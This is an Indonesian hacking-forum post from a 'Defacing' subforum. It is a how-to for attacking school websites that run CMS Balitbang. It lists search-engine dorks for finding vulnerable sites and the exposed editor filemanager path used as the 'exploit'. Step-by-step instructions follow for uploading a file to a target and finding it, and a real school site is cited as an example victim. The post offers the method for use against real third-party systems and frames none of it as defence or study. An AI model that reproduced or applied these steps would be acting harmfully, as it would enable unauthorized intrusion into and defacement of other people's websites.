Phinisi Crew [PC]
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Forum untuk saling berbagi tentang Dunia Hacking dan seputar IT lainnya

BAGI MEMBER TETAP PC AGAR SEGERA MENDAFTAR KARENA AKAN DIBAGI TUGAS

Bagi member yang sudah mendaftar namun tidak mendapatkan Email Konfirmasi, Harap hubungi Admin


CMS Balitbang

Phinisi Crew [PC] :: UNDERGROUND :: Defacing

Go down

CMS Balitbang Empty CMS Balitbang

Post by TraZh Sat Feb 01, 2014 10:35 am

Dork :

inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"


Exploit :

http:/namawebvlunanda/editor/filemanager/connectors/test.html


1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang

2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut

4). Setelah anda mendapatkan web yang vlun silahkan anda menggunakan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.

6). dan jika sudah masuk Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target dan klik upload.

Catatan :
Jika anda tidak memasuki web CMSnya atau error silahkan cari targer lain..Smile

File yang bisa disisipkan hanya file yang berekstensi .txt


7). Jika file sudah terupload , maka akan tampil peringatan file uploaded with no error


Cool. Setelah itu tinggal kita cari file yang disisipkan ke dalam web tersebut dan taraaa...

catatan

http://target.com/userfiles/file/Nama_File.txt

CONTOH

http://smpn4-malang.sch.id/userfiles/file/gr.txt

---TraZh---
TraZh
TraZh

Jumlah posting : 3
Join date : 03.01.14
Age : 27
Lokasi : Pinrang

Kembali Ke Atas Go down

Kembali Ke Atas

Phinisi Crew [PC] :: UNDERGROUND :: Defacing

 
Permissions in this forum:
Anda tidak dapat menjawab topik